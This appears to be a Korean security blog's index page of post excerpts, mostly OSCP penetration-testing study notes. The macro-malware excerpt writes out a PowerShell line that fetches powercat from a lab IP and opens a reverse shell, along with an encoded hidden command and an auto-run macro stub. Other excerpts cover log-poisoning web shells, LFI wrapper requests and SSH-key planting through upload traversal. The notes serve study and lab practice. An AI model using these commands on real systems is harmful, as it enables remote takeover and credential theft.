본문 바로가기

Tried. Failed. Logged.

728x90

전체 글747

취약점 분석 - NTLM 크리덴셜 패킷 스니퍼 (responder.py) GitHub repohttps://github.com/SpiderLabs/Responder GitHub - SpiderLabs/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue autheResponder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authenticat...github.com 사용 예시... 2025. 7. 27.

악성코드 분석 - 매크로 문서 악성 파일 IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell str = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwA..."n = 50for i in range(0, len(str), n): print("Str = Str + " + '"' + str[i:i+n] + '"')청크화(문자열이 너무 길면 오류가 발생) Sub AutoOpen() MyMacroEnd SubSub Document_Open() MyMacroEnd SubSub MyMacro() Di.. 2025. 7. 26.

OSCP - 9.3.2. Using Non-Executable Files 파일 업로드 시 실행이 불가능한 경우(e.g. 실행 권한이 없는 업로드 폴더)에 사용할 수 있는 취약점 분석 방법을 알아본다. 우선 파일 업로드 시 filename에 매개변수를 조작하여 ../../../../../../../test.txt를 넣어 서버로 전달한 경우 서버 측이 정상 응답을 한 경우 취약 가능성이 있을 수 있다. 특히 여기에 루트(/) 경로임에도 정상 업로드 된 것이라면 root의 홈디렉터리도 직접 접근이 가능함을 알 수 있다. kali@kali:~$ ssh-keygenGenerating public/private rsa key pair.Enter file in which to save the key (/home/kali/.ssh/id_rsa): fileupEnter passphras.. 2025. 7. 22.

OSCP - 9.2.2. PHP Wrappers admin.php 파일 내용kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=admin.php...Admin The admin page is currently under maintenance. 다음과 같이 LFI가 발생하는 경우(입력 검증 없이 바로 include 실행 => include $_GET["page"];)PHP Wrappers에 취약할 수 있다. admin.php 페이지 base64 인코딩(php://filter)kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resourc.. 2025. 7. 21.

OSCP - 9.2. File Inclusion Vulnerabilities, Labs Local File Inclusion (LFI) 및 access.log 포이즈닝 취약점 access.log 포이즈닝(오염)User-Agent 헤더에 한줄 짜리 웹쉘 코드를 넣는다. 이후 서버로 부터 요청이 가게 되면 서버 측에 아파치 로그 파일인 /var/log/apache2/access.log(윈도우 예시: C:\xampp\apache\logs\access.log)에는 사용자의 방문 정보(아이피 주소, 경로, User-Agent)가 남게 된다. 이제 LFI 취약점이 있는 파라미터에다 /var/log/apache2/access.log를 입력을 해 파일을 읽어 오게 되면서 해당 PHP 코드가 실행되면서 원격 코드 실행 취약이 발생한다. (*cmd 파라미터 앞에는 ?가 아닌 &이 올 것) nc -nvlp 4444좀 더 원활한 제어를 위한 경우 공격자는 리버스쉘을 열어 대상 서버가 연결을.. 2025. 7. 21.

OSCP - 9.1. Directory Traversal, Labs CVE-2021-43 --path-as-is 취약점 개요Grafana 8.x 버전에서 발생 하는 Path Traversal 취약점이다. 플러그인 API 엔드포인트의 경로에 대한 사용자 입력에 대한 검증이 미흡하여 서비스 영역 외의 상위 디렉터리 등에 액세스가 가능하게 된다. 문제의 코드 : https://github.com/grafana/grafana/blob/c80e7764d84d531fa56dca14d5b96cf0e7099c47/pkg/api/plugins.go#L284 참고https://github.com/taythebot/CVE-2021-43798 GitHub - taythebot/CVE-2021-43798: CVE-2021-43798 - Grafana 8.x Path Traversal (Pre-Auth)CVE-2021-43798 - Grafan.. 2025. 7. 21.

시스템 보안 - 해시(MD5, SHA1, SHA256) 확인 사이트 모음 해시 생성 https://hashes.com/en/generate/hash Generate MD5, SHA1, SHA256, SHA512, NTLM, MySQL, Whirlpool, Ripemd, Keccak, SHA3, SHAKE hashes online hashes.com 해시 식별 https://hashes.com/en/tools/hash_identifier Hash Type Identifier - Identify unknown hashesIdentify and detect unknown hashes using this tool. This page will tell you what type of hash a given string is. If you want to attempt to Decrypt.. 2025. 7. 18.

Oracle DB - 사용자 권한 및 테이블 확인 쿼리문 --현재 사용자 확인 SQL: SELECT USER FROM DUAL;-- 세션 사용자 확인:SELECT SYS_CONTEXT('USERENV','SESSION_USER') FROM DUAL;-- 권한 확인:SELECT * FROM SESSION_PRIVS;-- DBA 여부 확인:SELECT * FROM USER_ROLE_PRIVS;-- 테이블 목록 확인SELECT table_name FROM user_tables; 2025. 7. 17.

Oracle DB - 오라클 데이터베이스 서버 접속 클라이언트 모음(DBeaver, SQLPLUS) DBeaver(GUI)https://dbeaver.io/ DBeaver Community | Free Universal Database ToolDBeaver Universal Database Tool DBeaver Community is a free cross-platform database tool for developers, database administrators, analysts, and everyone working with data. It supports all popular SQL databases like MySQL, MariaDB, PostgreSQL, SQLite, Apachdbeaver.io SQLPLUS(CLI)https://www.oracle.com/database/technol.. 2025. 7. 17.

개인정보보호법 - 개인정보파일 검색 제32조(개인정보파일의 등록 및 공개) ① 공공기관의 장이 개인정보파일을 운용하는 경우에는 다음 각 호의 사항을 보호위원회에 등록하여야 한다. 원하는 (공공)기관이 어떤 개인정보를 어떠한 목적으로 수집 및 처리하는지 개인정보위원회가 제공하는 개인정보 포털에서 확인이 가능 https://www.privacy.go.kr/front/wcp/dcl/per/personalInfoFileSrhList.do#none 개인정보 포털개인정보보호위원회는 개인정보의 처리와 보호에 관한 사안을 독립적으로 수행하기 위해 설립된 합의제 중앙행정기관입니다.www.privacy.go.kr 2025. 7. 9.

Node.js - WSL nodejs 버전 업그레이드 nodejs 삭제sudo apt-get remove -y nodejssudo rm -rf /usr/local/lib/node_modules nodejs 설치curl -fsSL https://deb.nodesource.com/setup_22.x | sudo -E bash -sudo apt-get install -y nodejs 2025. 7. 9.

리눅스 - 레드햇 계정 분실 초기화 1. GRUB 화면에서 kernel 선택하고 'e' 키를 눌러 edit 진입 2. grub edit 맨 뒤에 single 또는 init=/bin/bash 입력 후 엔터 누르고, b를 눌러 재부팅 (이후 부트 후 쉘 진입 시) 3. mount -o remount,rw / 4. passwd root 5. sync 6. reboot -f 2025. 7. 7.

이전 1 2 3 4 5 ··· 63 다음

728x90

티스토리툴바